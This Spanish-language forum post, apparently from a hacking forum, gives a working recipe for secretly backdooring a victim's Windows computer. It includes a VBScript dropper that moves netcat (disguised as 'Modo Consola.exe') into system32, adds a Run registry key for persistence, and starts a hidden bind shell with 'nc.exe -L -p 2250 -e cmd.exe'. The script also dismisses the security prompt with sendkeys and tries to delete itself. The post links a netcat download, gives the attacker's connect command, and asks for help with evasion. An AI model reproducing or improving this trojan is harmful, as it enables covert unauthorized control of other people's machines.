Autor
Seguramente existen otras muchas formas, pero ami se me ha ocurrido esta:
se compone de dos partes, una son los archivos distribuidos a la victima,
la otra son los del hacker que quiere entrar.
1-parte
son dos archivos, uno de ellos es el nc.exe con nombre de Modo Consola.exe
y el otro es un vbs:
Código:
On Error Resume Next
nombre = wscript.scriptname
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
Set dirwin32 = fso.GetSpecialFolder(1)
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objfso = createobject("scripting.filesystemobject")
Objfso.movefile ".\ModoConsola.exe", dirwin32+"\nc.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WNet", "nc.exe -L -p 2250 -e cmd.exe"
Set correr = CreateObject("wscript.shell")
correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide
Set objshell = createobject("wscript.shell")
wscript.sleep 20
Objshell.sendkeys "{ENTER}"
Set objfso = createobject("scripting.filesystemobject")
Objfso.deletefile ".\"+nombre
el nc.exe lo podeis descargar aquí:
http://ares.hotshare.net/download/wqeRcXDFHgDF/wqIUSaopopHgIUwqwqNM/9324929be1/96241/nc.exe
le cambiais el nombre a Modo Consola.exe
la otra parte, me la ahorro (solo son archivos que automatizan la entrada),
copiais el nc en c:\windows\system32 (con nombre nc.exe).
para entrar en el otro ordenador entrais en la consola de comandos y escribis:
nc.exe IP 2250
en IP poneis la ip del ordenador al que quereis entrar.
y entrareis en la consola de comandos del otro ordenador donde podeis modificar cualquier cosa.
Aver si me ayudais con el vbs, tengo un par de problemas por ahora que no sé solucionar:
1-No se autoborra
2-al ejecutarlo en otro ordenador sale el mensaje de windows de que se va a ejecutar un archivo, creo haberlo solucionado con el sendkeys...
En línea
